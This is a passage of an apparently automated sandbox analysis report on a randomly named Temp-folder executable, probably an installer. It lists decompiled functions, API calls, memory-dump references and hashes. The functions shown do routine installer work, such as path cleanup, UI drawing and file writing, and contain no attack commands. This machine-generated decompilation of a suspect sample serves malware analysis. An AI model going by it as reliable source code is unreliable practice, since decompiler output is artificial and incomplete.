						_t13 = _t62 + 8; // 0x820
						_t60 = _t13;
						if( *((intOrPtr*)(_t62 + 4)) != 0xffffffff) {
							_t49 = _t60;
						} else {
							_t49 =  *_t60;
						}
						_t33 =  *_t62;
						 *(_t62 + 0x1c) =  *(_t62 + 0x1c) & 0x00000000;
						if(_t33 == 0) {
							 *_t60 =  *_t60 & 0x00000000;
						} else {
							if(_t33 == 1) {
								_t36 = E10001641(_t63);
								L27:
								 *_t49 = _t36;
								L31:
								_t34 = GlobalFree(_t63);
								if(_v4 == 0) {
									return _t34;
								}
								if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
									_v4 = _v4 + 1;
								} else {
									_v4 = _v4 & 0x00000000;
								}
								continue;
							}
							if(_t33 == 2) {
								 *_t49 = E10001641(_t63);
								_t49[1] = _t59;
								goto L31;
							}
							_t73 = _t33 - 3;
							if(_t73 == 0) {
								_t36 = E10001550(_t63);
								 *(_t62 + 0x1c) = _t36;
								goto L27;
							}
							if(_t73 > 0) {
								if(_t33 <= 5) {
									_t61 = GlobalAlloc(0x40,  *0x10004058 +  *0x10004058);
									 *(_t62 + 0x1c) = _t61;
									MultiByteToWideChar(0, 0, _t63,  *0x10004058, _t61,  *0x10004058);
									if( *_t62 != 5) {
										 *_t49 = _t61;
									} else {
										_t43 = GlobalAlloc(0x40, 0x10);
										 *(_t62 + 0x1c) = _t43;
										 *_t49 = _t43;
										__imp__CLSIDFromString(_t61, _t43);
										GlobalFree(_t61);
									}
								} else {
									if(_t33 == 6 && lstrlenA(_t63) > 0) {
										 *_t60 = E1000276E(E10001641(_t63));
									}
								}
							}
						}
						goto L31;
					}
					L9:
					_t32 = E10001550(0x10004034);
					goto L10;
				}
			}

















                                                                                                                          0x10002440
                                                                                                                          0x10002454
                                                                                                                          0x10002458
                                                                                                                          0x10002463
                                                                                                                          0x10002463
                                                                                                                          0x1000246a
                                                                                                                          0x1000246f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002473
                                                                                                                          0x10002476
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000247b
                                                                                                                          0x10002486
                                                                                                                          0x10002496
                                                                                                                          0x1000248d
                                                                                                                          0x1000248f
                                                                                                                          0x100024a5
                                                                                                                          0x100024a5
                                                                                                                          0x00000000
                                                                                                                          0x1000247d
                                                                                                                          0x1000247d
                                                                                                                          0x100024a6
                                                                                                                          0x100024aa
                                                                                                                          0x100024ac
                                                                                                                          0x100024ac
                                                                                                                          0x100024af
                                                                                                                          0x100024b5
                                                                                                                          0x100024b1
                                                                                                                          0x100024b1
                                                                                                                          0x100024b1
                                                                                                                          0x100024b7
                                                                                                                          0x100024b9
                                                                                                                          0x100024bf
                                                                                                                          0x1000258a
                                                                                                                          0x100024c5
                                                                                                                          0x100024c8
                                                                                                                          0x10002583
                                                                                                                          0x1000256f
                                                                                                                          0x10002570
                                                                                                                          0x1000258d
                                                                                                                          0x1000258e
                                                                                                                          0x10002599
                                                                                                                          0x100025c3
                                                                                                                          0x100025c3
                                                                                                                          0x100025a9
                                                                                                                          0x100025b5
                                                                                                                          0x100025ab
                                                                                                                          0x100025ab
                                                                                                                          0x100025ab
                                                                                                                          0x00000000
                                                                                                                          0x100025a9
                                                                                                                          0x100024d1
                                                                                                                          0x1000257b
                                                                                                                          0x1000257d
                                                                                                                          0x00000000
                                                                                                                          0x1000257d
                                                                                                                          0x100024d7
                                                                                                                          0x100024da
                                                                                                                          0x10002567
                                                                                                                          0x1000256c
                                                                                                                          0x00000000
                                                                                                                          0x1000256c
                                                                                                                          0x100024e0
                                                                                                                          0x100024e9
                                                                                                                          0x10002525
                                                                                                                          0x10002527
                                                                                                                          0x10002537
                                                                                                                          0x10002540
                                                                                                                          0x10002562
                                                                                                                          0x10002542
                                                                                                                          0x10002546
                                                                                                                          0x1000254d
                                                                                                                          0x10002551
                                                                                                                          0x10002553
                                                                                                                          0x1000255a
                                                                                                                          0x1000255a
                                                                                                                          0x100024eb
                                                                                                                          0x100024ee
                                                                                                                          0x10002510
                                                                                                                          0x10002512
                                                                                                                          0x100024ee
                                                                                                                          0x100024e9
                                                                                                                          0x100024e0
                                                                                                                          0x00000000
                                                                                                                          0x100024bf
                                                                                                                          0x1000249b
                                                                                                                          0x100024a0
                                                                                                                          0x00000000
                                                                                                                          0x100024a0

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 100024F5
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000251F
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 10002537
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 10002546
                                                                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 10002553
                                                                                                                          • GlobalFree.KERNEL32 ref: 1000255A
                                                                                                                          • GlobalFree.KERNEL32 ref: 1000258E
                                                                                                                            • Part of subcall function 10001550: lstrcpyA.KERNEL32(00000000,?,10001607,?,100011A1,-000000A0), ref: 1000155A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpylstrlen
                                                                                                                          • String ID: @u*v
                                                                                                                          • API String ID: 520554397-1046951355
                                                                                                                          • Opcode ID: 73698bcf168bc25748ca8d9a57d83aa9733e480b4e517d970f119df6c2bd3c01
                                                                                                                          • Instruction ID: 5e8646e4445d362173c86146a51869b75f136194909619477c3c659b9c9ef311
                                                                                                                          • Opcode Fuzzy Hash: 73698bcf168bc25748ca8d9a57d83aa9733e480b4e517d970f119df6c2bd3c01
                                                                                                                          • Instruction Fuzzy Hash: 5041BB71505B02DFF324CF248C94B6AB7F8FB443E2F614919F946DA189DB70E8808B66
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405C3F, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405C3F(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040553D(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054FB("*?|<>/\":", _t5))) == 0) {
							E00405675(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                          0x00405c41
                                                                                                                          0x00405c49
                                                                                                                          0x00405c5d
                                                                                                                          0x00405c5d
                                                                                                                          0x00405c63
                                                                                                                          0x00405c70
                                                                                                                          0x00405c70
                                                                                                                          0x00405c71
                                                                                                                          0x00405c73
                                                                                                                          0x00405c77
                                                                                                                          0x00405c79
                                                                                                                          0x00405c82
                                                                                                                          0x00405c84
                                                                                                                          0x00405c9e
                                                                                                                          0x00405ca6
                                                                                                                          0x00405ca6
                                                                                                                          0x00405cab
                                                                                                                          0x00405cad
                                                                                                                          0x00405caf
                                                                                                                          0x00405cb3
                                                                                                                          0x00405cb4
                                                                                                                          0x00405cb7
                                                                                                                          0x00405cbf
                                                                                                                          0x00405cc1
                                                                                                                          0x00405cc5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405ccb
                                                                                                                          0x00405cd0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405cd0
                                                                                                                          0x00405cd5

                                                                                                                          APIs
                                                                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                          • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                          • CharPrevA.USER32(?,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C40, 00405C7B
                                                                                                                          • "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" , xrefs: 00405C45
                                                                                                                          • *?|<>/":, xrefs: 00405C87
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 589700163-139789886
                                                                                                                          • Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                                                                                                          • Instruction ID: 6e21827f4117d195ccc2fee92ee9dbca2865e9be55a4e6ca6148cbd3e4a13511
                                                                                                                          • Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                                                                                                          • Instruction Fuzzy Hash: F011905580CB942AFB3206384C48B776F99CB67764F58407BE8C4723C2D67C5C429B6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403DF6, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403DF6(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                                          0x00403e08
                                                                                                                          0x00403e9c
                                                                                                                          0x00000000
                                                                                                                          0x00403e9c
                                                                                                                          0x00403e19
                                                                                                                          0x00403e1d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403e23
                                                                                                                          0x00403e2c
                                                                                                                          0x00403e2f
                                                                                                                          0x00403e2f
                                                                                                                          0x00403e35
                                                                                                                          0x00403e3b
                                                                                                                          0x00403e3b
                                                                                                                          0x00403e47
                                                                                                                          0x00403e4d
                                                                                                                          0x00403e54
                                                                                                                          0x00403e57
                                                                                                                          0x00403e5a
                                                                                                                          0x00403e5c
                                                                                                                          0x00403e5c
                                                                                                                          0x00403e64
                                                                                                                          0x00403e6a
                                                                                                                          0x00403e6a
                                                                                                                          0x00403e74
                                                                                                                          0x00403e79
                                                                                                                          0x00403e7c
                                                                                                                          0x00403e81
                                                                                                                          0x00403e84
                                                                                                                          0x00403e84
                                                                                                                          0x00403e94
                                                                                                                          0x00403e94
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                          • Instruction ID: 6c7fdd900eb09a88ca35fb2207b5deae9db7ec429e3ae93f4f07cdddb38981b8
                                                                                                                          • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                          • Instruction Fuzzy Hash: 1F219671904744ABCB219F78DD08B4B7FF8AF00715F048A2AF856E22E1C338EA04CB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E0040553D(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E00405695(_t52);
				_t27 = E004056B4(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423e94; // 0x7e00
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403080(_t47);
						E0040304E(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402E5B( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E00405675( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402E5B(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                                          0x0040267c
                                                                                                                          0x0040267e
                                                                                                                          0x0040268a
                                                                                                                          0x0040268d
                                                                                                                          0x00402697
                                                                                                                          0x0040269b
                                                                                                                          0x0040269b
                                                                                                                          0x004026a1
                                                                                                                          0x004026ae
                                                                                                                          0x004026b6
                                                                                                                          0x004026b9
                                                                                                                          0x004026bf
                                                                                                                          0x004026cd
                                                                                                                          0x004026d2
                                                                                                                          0x004026d6
                                                                                                                          0x004026d9
                                                                                                                          0x004026e2
                                                                                                                          0x004026ee
                                                                                                                          0x004026f2
                                                                                                                          0x004026f5
                                                                                                                          0x004026ff
                                                                                                                          0x0040271e
                                                                                                                          0x00402706
                                                                                                                          0x0040270b
                                                                                                                          0x00402713
                                                                                                                          0x00402716
                                                                                                                          0x0040271b
                                                                                                                          0x0040271b
                                                                                                                          0x00402725
                                                                                                                          0x00402725
                                                                                                                          0x00402737
                                                                                                                          0x0040273e
                                                                                                                          0x00402750
                                                                                                                          0x00402750
                                                                                                                          0x00402756
                                                                                                                          0x00402756
                                                                                                                          0x00402761
                                                                                                                          0x00402762
                                                                                                                          0x00402766
                                                                                                                          0x0040276a
                                                                                                                          0x00402770
                                                                                                                          0x00402770
                                                                                                                          0x00402777
                                                                                                                          0x00402164
                                                                                                                          0x0040288e
                                                                                                                          0x0040289a

                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00007E00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                                          • GlobalFree.KERNEL32 ref: 00402725
                                                                                                                          • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                                          • GlobalFree.KERNEL32 ref: 0040273E
                                                                                                                          • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3294113728-0
                                                                                                                          • Opcode ID: b65008d77356e61c7ec7953c9ee0e327e44be4943e63621df6e0ee83a23bc65b
                                                                                                                          • Instruction ID: 12be5ee7c0a04460072f4a22dab7179149aa53ae67e7a866020ad89d1ba75591
                                                                                                                          • Opcode Fuzzy Hash: b65008d77356e61c7ec7953c9ee0e327e44be4943e63621df6e0ee83a23bc65b
                                                                                                                          • Instruction Fuzzy Hash: 5831C071C00128BBDF216FA5CD88EAE7E79EF04368F10423AF524762E0C7795D419BA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404D7B, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404D7B(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423664; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f34; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059FF(0, _t39, 0x41fc50, 0x41fc50, _a4);
					}
					_t26 = lstrlenA(0x41fc50);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423648, 0x41fc50);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc50;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc50)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc50, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                                          0x00404d81
                                                                                                                          0x00404d8d
                                                                                                                          0x00404d90
                                                                                                                          0x00404d96
                                                                                                                          0x00404da2
                                                                                                                          0x00404da5
                                                                                                                          0x00404da8
                                                                                                                          0x00404dae
                                                                                                                          0x00404dae
                                                                                                                          0x00404db4
                                                                                                                          0x00404dbc
                                                                                                                          0x00404dbf
                                                                                                                          0x00404ddc
                                                                                                                          0x00404de0
                                                                                                                          0x00404de9
                                                                                                                          0x00404de9
                                                                                                                          0x00404df3
                                                                                                                          0x00404dfc
                                                                                                                          0x00404e08
                                                                                                                          0x00404e0f
                                                                                                                          0x00404e13
                                                                                                                          0x00404e16
                                                                                                                          0x00404e29
                                                                                                                          0x00404e37
                                                                                                                          0x00404e37
                                                                                                                          0x00404e3b
                                                                                                                          0x00404e3d
                                                                                                                          0x00404e40
                                                                                                                          0x00000000
                                                                                                                          0x00404e40
                                                                                                                          0x00404dc1
                                                                                                                          0x00404dc9
                                                                                                                          0x00404dd1
                                                                                                                          0x00404dd7
                                                                                                                          0x00000000
                                                                                                                          0x00404dd7
                                                                                                                          0x00404dd1
                                                                                                                          0x00404dbf
                                                                                                                          0x00404e4a

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                          • lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                          • lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                                                          • SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2531174081-0
                                                                                                                          • Opcode ID: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                                                                                                          • Instruction ID: 7f48be0438031ac4014e4461c76190d89e96d247d5b12388d0b77bfdc4e74ae1
                                                                                                                          • Opcode Fuzzy Hash: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                                                                                                          • Instruction Fuzzy Hash: 09216DB1E00158BBDB119FA5CD84ADEBFB9FF45354F14807AFA04B6290C7398A419B98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040464A, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040464A(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                          0x00404658
                                                                                                                          0x00404665
                                                                                                                          0x0040466b
                                                                                                                          0x004046a9
                                                                                                                          0x004046a9
                                                                                                                          0x004046b8
                                                                                                                          0x004046bf
                                                                                                                          0x00000000
                                                                                                                          0x004046c1
                                                                                                                          0x0040466d
                                                                                                                          0x0040467c
                                                                                                                          0x00404684
                                                                                                                          0x00404687
                                                                                                                          0x00404699
                                                                                                                          0x0040469f
                                                                                                                          0x004046a6
                                                                                                                          0x00000000
                                                                                                                          0x004046a6
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404665
                                                                                                                          • GetMessagePos.USER32 ref: 0040466D
                                                                                                                          • ScreenToClient.USER32 ref: 00404687
                                                                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404699
                                                                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046BF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                          • Instruction ID: 811e074b116e6ce6d11e192741490be2760717d42b69e64a674173994bb84636
                                                                                                                          • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                          • Instruction Fuzzy Hash: 4E014C71D00219BADB00DBA4DC85FFEBBB8AB59711F10052ABA00B61D0D7B8A9058BA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

